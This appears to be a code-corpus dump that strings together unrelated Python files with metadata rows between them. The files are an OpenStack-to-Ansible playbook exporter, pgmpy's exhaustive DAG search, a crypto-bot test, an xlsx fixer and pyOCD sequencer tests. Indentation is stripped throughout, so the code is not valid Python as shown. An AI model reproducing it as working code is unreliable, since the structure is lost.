const.FILE_PROJECTS: self.create_projects,
}
for iden_file, func in iden_funcs.items():
path = os.path.join(self.iden_path, iden_file)
dumped_data = func(self.data)
write_yaml(dumped_data, path)
def write_playbook(self):
playbook = const.PLAYBOOK
if conf.DUMP_NETWORKS:
playbook += const.NET_PLAYBOOK
if conf.DUMP_STORAGE:
playbook += const.STORAGE_PLAYBOOK
if conf.DUMP_SERVERS:
playbook += const.COMPUTE_PLAYBOOK
if conf.DUMP_IDENTITY:
playbook += const.IDENTITY_PLAYBOOK
with open(os.path.join(conf.PLAYS, "playbook.yml"), "w") as f:
f.write(playbook)
def create_projects(self, data, force_optimize=conf.VARS_OPT_PROJECTS):
projects = []
pre_optimized = []
for pro in data['projects']:
p = {'state': 'present'}
if pro.get('location') and pro['location'].get('cloud'):
p['cloud'] = pro['location']['cloud']
p['name'] = pro['name']
if value(pro, 'project', 'is_enabled'):
p['enabled'] = pro['is_enabled']
if value(pro, 'project', 'description'):
p['description'] = pro['description']
if value(pro, 'project', 'domain_id'):
p['domain_id'] = pro['domain_id']
if force_optimize:
pre_optimized.append({'os_project': p})
else:
projects.append({'os_project': p})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="projects")
if optimized:
projects.append(optimized)
return projects
def create_domains(self, data, force_optimize=conf.VARS_OPT_DOMAINS):
domains = []
pre_optimized = []
for dom in data['domains']:
d = {'state': 'present'}
if dom.get('location') and dom['location'].get('cloud'):
d['cloud'] = dom['location']['cloud']
d['name'] = dom['name']
if value(dom, 'domain', 'is_enabled'):
d['enabled'] = dom['is_enabled']
if value(dom, 'domain', 'description'):
d['description'] = dom['description']
if force_optimize:
pre_optimized.append({'os_keystone_domain': d})
else:
domains.append({'os_keystone_domain': d})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="domains")
if optimized:
domains.append(optimized)
return domains
def create_users(self, data, force_optimize=conf.VARS_OPT_USERS):
users = []
pre_optimized = []
domains_by_id = {d['id']: d['name'] for d in data['domains']}
projects_by_id = {d['id']: d['name'] for d in data['projects']}
for user in data['users']:
u = {'state': 'present'}
if user.get('location') and user['location'].get('cloud'):
u['cloud'] = user['location']['cloud']
u['name'] = user['name']
if value(user, 'user', 'is_enabled'):
u['enabled'] = user['is_enabled']
if value(user, 'user', 'description'):
u['description'] = user['description']
if value(user, 'user', 'domain_id'):
u['domain'] = domains_by_id[user['domain_id']]
if value(user, 'user', 'default_project_id'):
u['default_project'] = projects_by_id[user['default_project_id']]
if value(user, 'user', 'email'):
u['email'] = user['email']
if value(user, 'user', 'password'): # shouldn't be there
u['password'] = user['password']
if force_optimize:
pre_optimized.append({'os_user': u})
else:
users.append({'os_user': u})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="users")
if optimized:
users.append(optimized)
return users
def create_flavors(self, data, force_optimize=conf.VARS_OPT_FLAVORS):
flavors = []
pre_optimized = []
for flavor in data['flavors']:
fl = {'state': 'present'}
if flavor.get('location') and flavor['location'].get('cloud'):
fl['cloud'] = flavor['location']['cloud']
fl['name'] = flavor['name']
if value(flavor, 'flavor', 'disk'):
fl['disk'] = flavor['disk']
if value(flavor, 'flavor', 'ram'):
fl['ram'] = flavor['ram']
if value(flavor, 'flavor', 'vcpus'):
fl['vcpus'] = flavor['vcpus']
if value(flavor, 'flavor', 'swap'):
fl['swap'] = flavor['swap']
if value(flavor, 'flavor', 'rxtx_factor'):
fl['rxtx_factor'] = flavor['rxtx_factor']
if value(flavor, 'flavor', 'is_public'):
fl['is_public'] = flavor['is_public']
if value(flavor, 'flavor', 'ephemeral'):
fl['ephemeral'] = flavor['ephemeral']
if value(flavor, 'flavor', 'extra_specs'):
fl['extra_specs'] = flavor['extra_specs']
if force_optimize:
pre_optimized.append({'os_nova_flavor': fl})
else:
flavors.append({'os_nova_flavor': fl})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="flavors")
if optimized:
flavors.append(optimized)
return flavors
def create_subnets(self, data, force_optimize=conf.VARS_OPT_SUBNETS):
subnets = []
pre_optimized = []
net_ids = {i['id']: i['name'] for i in data['networks']}
for subnet in data['subnets']:
s = {'state': 'present'}
if subnet.get('location') and subnet['location'].get('cloud'):
s['cloud'] = subnet['location']['cloud']
s['name'] = subnet['name']
if subnet['network_id'] in net_ids:
s['network_name'] = net_ids[subnet['network_id']]
else:
print("subnet %s id=%s doesn't find its network id=%s" %
(subnet['name'], subnet['id'], subnet['network_id']))
continue
s['cidr'] = subnet['cidr']
if value(subnet, 'subnet', 'ip_version'):
s['ip_version'] = subnet['ip_version']
if value(subnet, 'subnet', 'enable_dhcp'):
s['enable_dhcp'] = subnet['is_dhcp_enabled']
if value(subnet, 'subnet', 'gateway_ip'):
s['gateway_ip'] = subnet['gateway_ip']
if value(subnet, 'subnet', 'dns_nameservers'):
s['dns_nameservers'] = subnet['dns_nameservers']
if value(subnet, 'subnet', 'ipv6_address_mode'):
s['ipv6_address_mode'] = subnet['ipv6_address_mode']
if value(subnet, 'subnet', 'ipv6_ra_mode'):
s['ipv6_ra_mode'] = subnet['ipv6_ra_mode']
if value(subnet, 'subnet', 'host_routes'):
s['host_routes'] = subnet['host_routes']
if force_optimize:
pre_optimized.append({'os_subnet': s})
else:
subnets.append({'os_subnet': s})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="subnets")
if optimized:
subnets.append(optimized)
return subnets
def create_networks(self, data, force_optimize=conf.VARS_OPT_NETWORKS):
networks = []
pre_optimized = []
for network in data['networks']:
n = {'state': 'present'}
if network.get('location') and network['location'].get('cloud'):
n['cloud'] = network['location']['cloud']
n['name'] = network['name']
if value(network, 'network', 'is_admin_state_up'):
n['admin_state_up'] = network['is_admin_state_up']
if value(network, 'network', 'is_router_external'):
n['external'] = network['is_router_external']
if value(network, 'network', 'is_port_security_enabled'):
n['port_security_enabled'] = network['is_port_security_enabled']
if value(network, 'network', 'is_shared'):
n['shared'] = network['is_shared']
if value(network, 'network', 'provider_network_type'):
n['provider_network_type'] = network['provider_network_type']
if value(network, 'network', 'provider_physical_network'):
n['provider_physical_network'] = network[
'provider_physical_network']
if value(network, 'network', 'provider_segmentation_id'):
n['provider_segmentation_id'] = network[
'provider_segmentation_id']
# if value(network, 'network', 'mtu'):
# n['mtu'] = network['mtu']
if value(network, 'network', 'dns_domain'):
n['dns_domain'] = network['dns_domain']
if force_optimize:
pre_optimized.append({'os_network': n})
else:
networks.append({'os_network': n})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="networks")
if optimized:
networks.append(optimized)
return networks
def create_security_groups(self, data,
force_optimize=conf.VARS_OPT_SECGROUPS):
secgrs = []
secgrs_ids = {i['id']: i['name'] for i in data['secgroups']}
for secgr in data['secgroups']:
s = {'state': 'present'}
if secgr.get('location') and secgr['location'].get('cloud'):
s['cloud'] = secgr['location']['cloud']
s['name'] = secgr['name']
secgrs.append({'os_security_group': s})
if value(secgr, 'security_group', 'description'):
s['description'] = secgr['description']
if secgr.get('security_group_rules'):
pre_optimized = []
for rule in secgr['security_group_rules']:
r = {'security_group': secgr['name']}
if s.get('cloud'):
r['cloud'] = s['cloud']
if value(rule, 'security_group_rule', 'description'):
r['description'] = rule['description']
if value(rule, 'security_group_rule', 'ethertype'):
r['ethertype'] = rule['ethertype']
if value(rule, 'security_group_rule', 'direction'):
r['direction'] = rule['direction']
if value(rule, 'security_group_rule', 'port_range_max'):
r['port_range_max'] = rule['port_range_max']
if value(rule, 'security_group_rule', 'port_range_min'):
r['port_range_min'] = rule['port_range_min']
if value(rule, 'security_group_rule', 'protocol'):
r['protocol'] = rule['protocol']
if value(rule, 'security_group_rule', 'remote_group_id'):
r['remote_group'] = secgrs_ids[rule['remote_group_id']]
if value(rule, 'security_group_rule', 'remote_ip_prefix'):
r['remote_ip_prefix'] = rule['remote_ip_prefix']
if force_optimize:
pre_optimized.append({'os_security_group_rule': r})
else:
secgrs.append({'os_security_group_rule': r})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name=secgr['name'].replace('-', '_') + "_rules")
if optimized:
secgrs.append(optimized)
return secgrs
def create_routers(self, data, strict_ip=False,
force_optimize=conf.VARS_OPT_ROUTERS):
routers = []
pre_optimized = []
subnet_ids = {i['id']: i for i in data['subnets']}
net_ids = {i['id']: i for i in data['networks']}
for rout in data['routers']:
r = {'state': 'present'}
if rout.get('location') and rout['location'].get('cloud'):
r['cloud'] = rout['location']['cloud']
r['name'] = rout['name']
if value(rout, 'router', 'is_admin_state_up'):
r['admin_state_up'] = rout['is_admin_state_up']
r['interfaces'] = []
ports = [i for i in data['ports'] if i['device_id'] == rout['id']]
for p in ports:
for fip in p['fixed_ips']:
subnet = subnet_ids.get(fip['subnet_id'])
if not subnet:
raise Exception("No subnet with ID=%s" %
fip['subnet_id'])
if subnet['gateway_ip'] == fip['ip_address']:
r['interfaces'].append(subnet['name'])
else:
net = net_ids.get(p['network_id'])
if not net:
raise Exception("No network with ID=%s" %
p['network_id'])
net_name = net['name']
subnet_name = subnet['name']
portip = fip['ip_address']
r['interfaces'].append({
'net': net_name,
'subnet': subnet_name,
'portip': portip,
})
if not r['interfaces']:
del r['interfaces']
if rout['external_gateway_info']:
ext_net = net_ids.get(
rout['external_gateway_info']['network_id'])
if not ext_net:
raise Exception("No net with ID=%s" % rout[
'external_gateway_info']['network_id'])
ext_net_name = ext_net['name']
r['network'] = ext_net_name
if len(rout['external_gateway_info']['external_fixed_ips']
) == 1:
ext = rout['external_gateway_info']['external_fixed_ips'][0]
if strict_ip:
ext_sub_id = ext['subnet_id']
ext_subnet = subnet_ids.get(ext_sub_id)
if not ext_subnet:
# raise Exception("No subnet with ID" )
ext_sub_name = ext_sub_id
else:
ext_sub_name = ext_subnet['name']
ext_fip = ext['ip_address']
r['external_fixed_ips'] = [{
'subnet': ext_sub_name,
'ip': ext_fip
}]
if len(rout['external_gateway_info']['external_fixed_ips']) > 1:
ext_ips = rout['external_gateway_info']['external_fixed_ips']
for ext in ext_ips:
ext_sub_id = ext['subnet_id']
ext_subnet = subnet_ids.get(ext_sub_id)
if not ext_subnet:
# raise Exception("No subnet with ID=%s" % ext_sub_id)
ext_sub_name = ext_sub_id
else:
ext_sub_name = ext_subnet['name']
ext_fip = ext['ip_address']
r['external_fixed_ips'] = [{
'subnet': ext_sub_name,
'ip': ext_fip
}]
if force_optimize:
pre_optimized.append({'os_router': r})
else:
routers.append({'os_router': r})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="routers")
if optimized:
routers.append(optimized)
return routers
def create_servers(self, data, force_optimize=conf.VARS_OPT_SERVERS):
def get_boot_volume(volumes):
# Let's assume it's only one bootable volume
for v in volumes:
vol = volumes_dict[v['id']]
if not vol['is_bootable']:
continue
return vol
def has_floating(addresses):
return 'floating' in [
j['OS-EXT-IPS:type'] for i in list(addresses.values()) for j in i]
servers = []
pre_optimized = []
if conf.DUMP_STORAGE:
volumes_dict = {i['id']: i for i in data['volumes']}
images_dict = {i['id']: i['name'] for i in data['images']}
else:
volumes_dict = {}
images_dict = {}
flavors_names = {i['id']: i['name'] for i in data['flavors']}
for ser in data['servers']:
s = {'state': 'present'}
s['name'] = ser['name']
if ser.get('location') and ser['location'].get('cloud'):
s['cloud'] = ser['location']['cloud']
if value(ser, 'server', 'security_groups'):
s['security_groups'] = list(set(
[i['name'] for i in ser['security_groups']]))
s['flavor'] = flavors_names[ser['flavor']['id']]
if value(ser, 'server', 'key_name'):
s['key_name'] = ser['key_name']
if value(ser, 'server', 'scheduler_hints'):
s['scheduler_hints'] = ser['scheduler_hints']
if value(ser, 'server', 'metadata'):
s['meta'] = ser['metadata']
if value(ser, 'server', 'config_drive'):
s['config_drive'] = ser['config_drive'] == 'True'
if value(ser, 'server', 'user_data'):
s['userdata'] = ser['user_data']
# Images and volumes
if ser['image']['id']:
if ser['image']['id'] in images_dict:
s['image'] = (
ser['image']['id']
if not conf.IMAGES_AS_NAMES
else images_dict[ser['image']['id']])
else:
print("Image with ID=%s of server %s is not in images list" %
(ser['image']['id'], ser['name']))
continue
else:
# Dancing with boot volumes
if conf.USE_EXISTING_BOOT_VOLUMES:
s['boot_volume'] = get_boot_volume(
ser['attached_volumes'])['id']
# s['volumes'] = [i['id'] for i in ser['attached_volumes']]
elif conf.USE_SERVER_IMAGES:
meta = get_boot_volume(ser['attached_volumes'])[
'volume_image_metadata']
s['image'] = (meta['image_name']
if conf.IMAGES_AS_NAMES else meta['image_id'])
if conf.CREATE_NEW_BOOT_VOLUMES:
s['boot_from_volume'] = True
s['volume_size'] = get_boot_volume(
ser['attached_volumes'])['size']
if ser.get('attached_volumes'):
non_bootable_volumes = [i['id'] for i in ser['attached_volumes']
if not volumes_dict[i['id']]['is_bootable']]
if non_bootable_volumes:
s['volumes'] = non_bootable_volumes
if ser.get('addresses'):
if conf.NETWORK_AUTO:
# In case of DHCP just connect to networks
nics = [{"net-name": i}
for i in list(ser['addresses'].keys())]
s['nics'] = nics
elif conf.STRICT_NETWORK_IPS:
s['nics'] = []
for net in list(ser['addresses'].keys()):
for ip in ser['addresses'][net]:
if ip['OS-EXT-IPS:type'] == 'fixed':
s['nics'].append(
{'net-name': net, 'fixed_ip': ip['addr']})
if conf.FIP_AUTO:
# If there are existing floating IPs only
s['auto_ip'] = has_floating(ser['addresses'])
elif conf.STRICT_FIPS:
fips = [j['addr'] for i in list(ser['addresses'].values())
for j in i if j['OS-EXT-IPS:type'] == 'floating']
s['floating_ips'] = fips
if force_optimize:
pre_optimized.append({'os_server': s})
else:
servers.append({'os_server': s})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="servers")
if optimized:
servers.append(optimized)
return servers
def create_keypairs(self, data, force_optimize=conf.VARS_OPT_KEYPAIRS):
keypairs = []
pre_optimized = []
for key in data['keypairs']:
k = {'state': 'present'}
k['name'] = key['name']
if key.get('location') and key['location'].get('cloud'):
k['cloud'] = key['location']['cloud']
if value(key, 'keypair', 'public_key'):
k['public_key'] = key['public_key']
if force_optimize:
pre_optimized.append({'os_keypair': k})
else:
keypairs.append({'os_keypair': k})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="keypairs")
if optimized:
keypairs.append(optimized)
return keypairs
def create_images(self, data, set_id=False,
force_optimize=conf.VARS_OPT_IMAGES):
imgs = []
pre_optimized = []
for img in data['images']:
im = {'state': 'present'}
im['name'] = img['name']
if set_id:
im['id'] = img['id']
if img.get('location') and img['location'].get('cloud'):
im['cloud'] = img['location']['cloud']
if value(img, 'image', 'checksum'):
im['checksum'] = img['checksum']
if value(img, 'image', 'container_format'):
im['container_format'] = img['container_format']
if value(img, 'image', 'disk_format'):
im['disk_format'] = img['disk_format']
if value(img, 'image', 'owner_id'):
im['owner'] = img['owner_id']
if value(img, 'image', 'min_disk'):
im['min_disk'] = img['min_disk']
if value(img, 'image', 'min_ram'):
im['min_ram'] = img['min_ram']
if value(img, 'image', 'visibility'):
im['is_public'] = (img['visibility'] == 'public')
# Supported in ansible > 2.8
# if value(img, 'image', 'is_protected'):
# im['protected'] = img['is_protected']
if value(img, 'image', 'file'):
im['filename'] = img['file']
if value(img, 'image', 'ramdisk_id'):
im['ramdisk'] = img['ramdisk_id']
if value(img, 'image', 'kernel_id'):
im['kernel'] = img['kernel_id']
if value(img, 'image', 'volume'):
im['volume'] = img['volume']
if value(img, 'image', 'properties'):
im['properties'] = img['properties']
if force_optimize:
pre_optimized.append({'os_image': im})
else:
imgs.append({'os_image': im})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="images")
if optimized:
imgs.append(optimized)
return imgs
def create_volumes(self, data, force_optimize=conf.VARS_OPT_VOLUMES):
vols = []
pre_optimized = []
for vol in data['volumes']:
v = {'state': 'present'}
if not vol['name'] and conf.SKIP_UNNAMED_VOLUMES:
continue
if not vol['name']:
v['display_name'] = vol['id']
v['display_name'] = vol['name']
if vol.get('location') and vol['location'].get('cloud'):
v['cloud'] = vol['location']['cloud']
if value(vol, 'volume', 'display_description'):
v['display_description'] = vol['description']
if value(vol, 'volume', 'size'):
v['size'] = vol['size']
if ('volume_image_metadata' in vol and 'image_name'
in vol['volume_image_metadata']):
v['image'] = vol['volume_image_metadata']['image_name']
if value(vol, 'volume', 'metadata'):
v['metadata'] = vol['metadata']
if value(vol, 'volume', 'scheduler_hints'):
v['scheduler_hints'] = vol['scheduler_hints']
if value(vol, 'volume', 'snapshot_id'):
v['snapshot_id'] = vol['snapshot_id']
if value(vol, 'volume', 'source_volume_id'):
v['volume'] = vol['source_volume_id']
if force_optimize:
pre_optimized.append({'os_volume': v})
else:
vols.append({'os_volume': v})
if force_optimize:
optimized = optimize(
pre_optimized,
var_name="volumes")
if optimized:
vols.append(optimized)
return vols
def main():
playbook = OpenstackAnsible("test-cloud")
playbook.run()
if __name__ == "__main__":
main()
| 44.078571 | 84 | 0.500826 |
058c059f761eda96c89499a971e05f607a042f58 | 8,572 | py | Python | pgmpy/estimators/ExhaustiveSearch.py | SkySlime/pgmpy | f379c8c3ca58651f4309b20289a09e7636fc0157 | [
"MIT"
] | null | null | null | pgmpy/estimators/ExhaustiveSearch.py | SkySlime/pgmpy | f379c8c3ca58651f4309b20289a09e7636fc0157 | [
"MIT"
] | null | null | null | pgmpy/estimators/ExhaustiveSearch.py | SkySlime/pgmpy | f379c8c3ca58651f4309b20289a09e7636fc0157 | [
"MIT"
] | 1 | 2021-11-05T03:27:56.000Z | 2021-11-05T03:27:56.000Z | #!/usr/bin/env python
from warnings import warn
from itertools import combinations
import networkx as nx
from pgmpy.estimators import StructureEstimator, ScoreCache
from pgmpy.estimators import K2Score
from pgmpy.utils.mathext import powerset
from pgmpy.base import DAG
class ExhaustiveSearch(StructureEstimator):
def __init__(self, data, scoring_method=None, use_cache=True, **kwargs):
"""
Search class for exhaustive searches over all DAGs with a given set of variables.
Takes a `StructureScore`-Instance as parameter; `estimate` finds the model with maximal score.
Parameters
----------
data: pandas DataFrame object
dataframe object where each column represents one variable.
(If some values in the data are missing the data cells should be set to `numpy.NaN`.
Note that pandas converts each column containing `numpy.NaN`s to dtype `float`.)
scoring_method: Instance of a `StructureScore`-subclass (`K2Score` is used as default)
An instance of `K2Score`, `BDeuScore`, or `BicScore`.
This score is optimized during structure estimation by the `estimate`-method.
state_names: dict (optional)
A dict indicating, for each variable, the discrete set of states (or values)
that the variable can take. If unspecified, the observed values in the data set
are taken to be the only possible states.
use_caching: boolean
If True, uses caching of score for faster computation.
Note: Caching only works for scoring methods which are decomposible. Can
give wrong results in case of custom scoring methods.
complete_samples_only: bool (optional, default `True`)
Specifies how to deal with missing data, if present. If set to `True` all rows
that contain `np.Nan` somewhere are ignored. If `False` then, for each variable,
every row where neither the variable nor its parents are `np.NaN` is used.
This sets the behavior of the `state_count`-method.
"""
if scoring_method is not None:
if use_cache:
self.scoring_method = ScoreCache.ScoreCache(scoring_method, data)
else:
self.scoring_method = scoring_method
else:
self.scoring_method = ScoreCache.ScoreCache(K2Score(data, **kwargs), data)
super(ExhaustiveSearch, self).__init__(data, **kwargs)
def all_dags(self, nodes=None):
"""
Computes all possible directed acyclic graphs with a given set of nodes,
sparse ones first. `2**(n*(n-1))` graphs need to be searched, given `n` nodes,
so this is likely not feasible for n>6. This is a generator.
Parameters
----------
nodes: list of nodes for the DAGs (optional)
A list of the node names that the generated DAGs should have.
If not provided, nodes are taken from data.
Returns
-------
dags: Generator object for nx.DiGraphs
Generator that yields all acyclic nx.DiGraphs, ordered by number of edges. Empty DAG first.
Examples
--------
>>> import pandas as pd
>>> from pgmpy.estimators import ExhaustiveSearch
>>> s = ExhaustiveSearch(pd.DataFrame(data={'Temperature': [23, 19],
'Weather': ['sunny', 'cloudy'],
'Humidity': [65, 75]}))
>>> list(s.all_dags())
[<networkx.classes.digraph.DiGraph object at 0x7f6955216438>,
<networkx.classes.digraph.DiGraph object at 0x7f6955216518>,
....
>>> [dag.edges() for dag in s.all_dags()]
[[], [('Humidity', 'Temperature')], [('Humidity', 'Weather')],
[('Temperature', 'Weather')], [('Temperature', 'Humidity')],
....
[('Weather', 'Humidity'), ('Weather', 'Temperature'), ('Temperature', 'Humidity')]]
"""
if nodes is None:
nodes = sorted(self.state_names.keys())
if len(nodes) > 6:
warn("Generating all DAGs of n nodes likely not feasible for n>6!")
warn(
"Attempting to search through {0} graphs".format(
2 ** (len(nodes) * (len(nodes) - 1))
)
)
edges = list(combinations(nodes, 2)) # n*(n-1) possible directed edges
edges.extend([(y, x) for x, y in edges])
all_graphs = powerset(edges) # 2^(n*(n-1)) graphs
for graph_edges in all_graphs:
graph = nx.DiGraph()
graph.add_nodes_from(nodes)
graph.add_edges_from(graph_edges)
if nx.is_directed_acyclic_graph(graph):
yield graph
def all_scores(self):
"""
Computes a list of DAGs and their structure scores, ordered by score.
Returns
-------
list: a list of (score, dag) pairs
A list of (score, dag)-tuples, where score is a float and model a acyclic nx.DiGraph.
The list is ordered by score values.
Examples
--------
>>> import pandas as pd
>>> import numpy as np
>>> from pgmpy.estimators import ExhaustiveSearch, K2Score
>>> # create random data sample with 3 variables, where B and C are identical:
>>> data = pd.DataFrame(np.random.randint(0, 5, size=(5000, 2)), columns=list('AB'))
>>> data['C'] = data['B']
>>> searcher = ExhaustiveSearch(data, scoring_method=K2Score(data))
>>> for score, model in searcher.all_scores():
... print("{0}\t{1}".format(score, model.edges()))
-24234.44977974726 [('A', 'B'), ('A', 'C')]
-24234.449760691063 [('A', 'B'), ('C', 'A')]
-24234.449760691063 [('A', 'C'), ('B', 'A')]
-24203.700955937973 [('A', 'B')]
-24203.700955937973 [('A', 'C')]
-24203.700936881774 [('B', 'A')]
-24203.700936881774 [('C', 'A')]
-24203.700936881774 [('B', 'A'), ('C', 'A')]
-24172.952132128685 []
-16597.30920265254 [('A', 'B'), ('A', 'C'), ('B', 'C')]
-16597.30920265254 [('A', 'B'), ('A', 'C'), ('C', 'B')]
-16597.309183596342 [('A', 'B'), ('C', 'A'), ('C', 'B')]
-16597.309183596342 [('A', 'C'), ('B', 'A'), ('B', 'C')]
-16566.560378843253 [('A', 'B'), ('C', 'B')]
-16566.560378843253 [('A', 'C'), ('B', 'C')]
-16268.324549347722 [('A', 'B'), ('B', 'C')]
-16268.324549347722 [('A', 'C'), ('C', 'B')]
-16268.324530291524 [('B', 'A'), ('B', 'C')]
-16268.324530291524 [('B', 'C'), ('C', 'A')]
-16268.324530291524 [('B', 'A'), ('C', 'B')]
-16268.324530291524 [('C', 'A'), ('C', 'B')]
-16268.324530291524 [('B', 'A'), ('B', 'C'), ('C', 'A')]
-16268.324530291524 [('B', 'A'), ('C', 'A'), ('C', 'B')]
-16237.575725538434 [('B', 'C')]
-16237.575725538434 [('C', 'B')]
"""
scored_dags = sorted(
[(self.scoring_method.score(dag), dag) for dag in self.all_dags()],
key=lambda x: x[0],
)
return scored_dags
def estimate(self):
"""
Estimates the `DAG` structure that fits best to the given data set,
according to the scoring method supplied in the constructor.
Exhaustively searches through all models. Only estimates network structure, no parametrization.
Returns
-------
model: `DAG` instance
A `DAG` with maximal score.
Examples
--------
>>> import pandas as pd
>>> import numpy as np
>>> from pgmpy.estimators import ExhaustiveSearch
>>> # create random data sample with 3 variables, where B and C are identical:
>>> data = pd.DataFrame(np.random.randint(0, 5, size=(5000, 2)), columns=list('AB'))
>>> data['C'] = data['B']
>>> est = ExhaustiveSearch(data)
>>> best_model = est.estimate()
>>> best_model
<pgmpy.base.DAG.DAG object at 0x7f695c535470>
>>> best_model.edges()
[('B', 'C')]
"""
best_dag = max(self.all_dags(), key=self.scoring_method.score)
best_model = DAG()
best_model.add_nodes_from(sorted(best_dag.nodes()))
best_model.add_edges_from(sorted(best_dag.edges()))
return best_model
| 42.86 | 103 | 0.558213 |
64300882d550f521f9d8325c9a17ca3378315613 | 782 | py | Python | test_my_crypto.py | nkaviani/demo-crypto-bot | 59d61cdec675a038d7c0c46f71893a145df59b97 | [
"Apache-2.0"
] | 2 | 2017-12-20T17:13:09.000Z | 2018-01-11T12:38:11.000Z | test_my_crypto.py | nimakaviani/demo-crypto-bot | 59d61cdec675a038d7c0c46f71893a145df59b97 | [
"Apache-2.0"
] | null | null | null | test_my_crypto.py | nimakaviani/demo-crypto-bot | 59d61cdec675a038d7c0c46f71893a145df59b97 | [
"Apache-2.0"
] | null | null | null | import pytest
import os
# integration tests
@pytest.fixture
def my_crypto_no_watson(capsys, monkeypatch):
from helpers.notifier import Notifier
from my_crypto import MyCrypto
def patched_report(self, recipient_id, wallet, time):
assert recipient_id == "sender-id"
def patched_quick_reply(self, recipient_id, msg):
assert recipient_id == "sender-id"
assert ('balance' in msg or 'account' in msg)
monkeypatch.setattr(Notifier, "quick_reply", patched_quick_reply)
monkeypatch.setattr(Notifier, "balance", patched_report)
return MyCrypto()
@pytest.mark.usefixtures("my_crypto_no_watson")
def test_handle(my_crypto_no_watson):
response = {"sender": "sender-id", "message": "balance"}
my_crypto_no_watson.handle(response)
| 30.076923 | 69 | 0.735294 |
caa433a70652038e6cadb2dae271e10758c7e155 | 1,179 | py | Python | fix_xlsx.py | hasadna/israel_tree_removal_permit_scraper | 808817463cdfefc17ce1d16bb95632414a1d4d4a | [
"MIT"
] | 1 | 2021-02-08T14:27:25.000Z | 2021-02-08T14:27:25.000Z | fix_xlsx.py | hasadna/israel_tree_removal_permit_scraper | 808817463cdfefc17ce1d16bb95632414a1d4d4a | [
"MIT"
] | null | null | null | fix_xlsx.py | hasadna/israel_tree_removal_permit_scraper | 808817463cdfefc17ce1d16bb95632414a1d4d4a | [
"MIT"
] | null | null | null | import logging
from io import BytesIO
from pathlib import Path
from openpyxl import load_workbook
logger = logging.getLogger(__name__)
def fix_excel_file(p):
wb = load_workbook(p)
ws = wb.active
empty = []
for i, row in enumerate(ws.rows, 1):
if not any(c.value for c in row):
empty.append(i)
if not empty:
return False, p
logger.warning(
f"Fixing {p.name}: deleting empty rows #{','.join(str(x) for x in empty)}"
)
for idx in empty[::-1]:
ws.delete_rows(idx, 1)
stream = BytesIO()
wb.save(stream)
stream.seek(0)
return True, stream
def fix_xlsx_files(folder: Path):
for p in folder.glob("*.xlsx"):
logger.info(f"Checking {p.name}...")
fixed, bio = fix_excel_file(p)
if fixed:
logger.warning(f"Overwriting {p.name}")
with p.open("wb") as f:
f.write(bio.read())
if __name__ == "__main__":
logging.basicConfig(
format="[%(levelname)s %(asctime)s %(module)s:%(lineno)d] %(message)s",
level=logging.INFO,
)
downloads = Path(__file__).parent / "downloads"
fix_xlsx_files(downloads)
| 24.061224 | 82 | 0.597116 |
df13087384d076ca81957412378ba83cb3f7c8d2 | 8,993 | py | Python | test/unit/test_sequencer.py | claymation/pyOCD | 7f1db3b64c16e54a791421cdf4946418f13848ff | [
"Apache-2.0"
] | 276 | 2020-09-30T16:43:24.000Z | 2022-03-27T09:52:01.000Z | test/unit/test_sequencer.py | claymation/pyOCD | 7f1db3b64c16e54a791421cdf4946418f13848ff | [
"Apache-2.0"
] | 282 | 2020-10-02T17:45:29.000Z | 2022-03-31T10:37:30.000Z | test/unit/test_sequencer.py | claymation/pyOCD | 7f1db3b64c16e54a791421cdf4946418f13848ff | [
"Apache-2.0"
] | 106 | 2020-10-01T10:06:44.000Z | 2022-03-29T10:06:06.000Z | # pyOCD debugger
# Copyright (c) 2018-2019 Arm Limited
# Copyright (c) 2021 Chris Reed
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import six
from pyocd.utility.sequencer import CallSequence
class TestCallSequence:
def test_empty(self):
cs = CallSequence()
assert cs.count == 0
def test_a(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.invoke()
assert results == ['a ran', 'b ran']
def test_append_1(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
)
assert cs.count == 1
cs.append(
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.invoke()
assert results == ['a ran', 'b ran']
def test_append_2(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
)
assert cs.count == 1
cs.append(
('b', lambda : results.append('b ran')),
('c', lambda : results.append('c ran')),
)
assert cs.count == 3
cs.invoke()
assert results == ['a ran', 'b ran', 'c ran']
def test_remove_1(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.remove_task('b')
assert cs.count == 1
cs.invoke()
assert results == ['a ran']
def test_callable(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs()
assert results == ['a ran', 'b ran']
def test_nested(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs2 = CallSequence(
('c', cs),
)
assert cs2.count == 1
cs2.invoke()
assert results == ['a ran', 'b ran']
def test_clear(self):
results = []
cs = CallSequence(
('a', lambda : results.append('a ran')),
('b', lambda : results.append('b ran')),
)
assert cs.count == 2
cs.clear()
assert cs.count == 0
def test_iter(self):
results = []
def task_a():
results.append('a ran')
def task_b():
results.append('b ran')
cs = CallSequence(
('a', task_a),
('b', task_b),
)
assert cs.count == 2
it = iter(cs)
print("it=",repr(it),dir(it))
assert six.next(it) == ('a', task_a)
assert six.next(it) == ('b', task_b)
with pytest.raises(StopIteration):
six.next(it)
def test_get(self):
results = []
def task_a():
results.append('a ran')
